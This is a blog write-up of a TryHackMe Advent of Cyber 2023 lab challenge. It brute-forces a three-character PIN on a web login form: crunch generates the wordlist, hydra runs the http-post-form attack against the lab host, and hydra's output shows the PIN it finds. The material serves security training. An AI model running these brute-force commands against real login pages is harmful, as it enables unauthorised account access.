Home Hydra is Coming to Town
Post
Cancel

Hydra is Coming to Town

Posted Dec 4, 2023 Updated Dec 7, 2023
By KS
1 min read

Challenge Information

  • Advent of Cyber Day 3
  • THM link here

Explanation

Basically this is a brute forcing challenge where you need to get the correct pin.

wrong pin result.

To solve this challenge, just create a list of different combination. Since the pin is only 3 digits, we could easily generate it with crunch.

1
2
3
4
5
6
7
8
9
10

crunch 3 3 0123456789ABCDEF -o pin.txt
Crunch will now generate the following amount of data: 16384 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 4096 

crunch: 100% completed generating output

After the pin is generated, Use hydra to brute force it.

1
2
3
4
5
6
7
8
9
10
11
12
13

hydra -l '' -P pin.txt -f 10.10.154.129 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-04 16:26:41
[DATA] max 16 tasks per 1 server, overall 16 tasks, 4096 login tries (l:1/p:4096), ~256 tries per task
[DATA] attacking http-post-form://10.10.154.129:8000/login.php:pin=^PASS^:Access denied
[STATUS] 434.00 tries/min, 434 tries in 00:01h, 3662 to do in 00:09h, 16 active
[STATUS] 438.00 tries/min, 1314 tries in 00:03h, 2782 to do in 00:07h, 16 active
[8000][http-post-form] host: 10.10.154.129   password: 6F5
[STATUS] attack finished for 10.10.154.129 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-04 16:30:46

It is tricky to use Hydra when brute-forcing http as it requies custom input. The input /login.php is taken from the name of the page that shows the pin and the input pin can be taken from the source code somewhere the <form method='post and <input.

1
2

<form method="post" action="login.php" class="grid grid-cols-3 max-w-lg mx-auto bg-thm-900 p-4 font-mono">
      <input type="hidden" name="pin" />

After entering the correct password, it leads to a new page where flag can be retrieved.

Things I learned from the challenge

  • Brute-forcing with hydra
  • generate password list using crunch
THM
AoC-2023 Brute-Forcing
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents

O Data, All Ye Faithful

Baby, it's CeWLd outside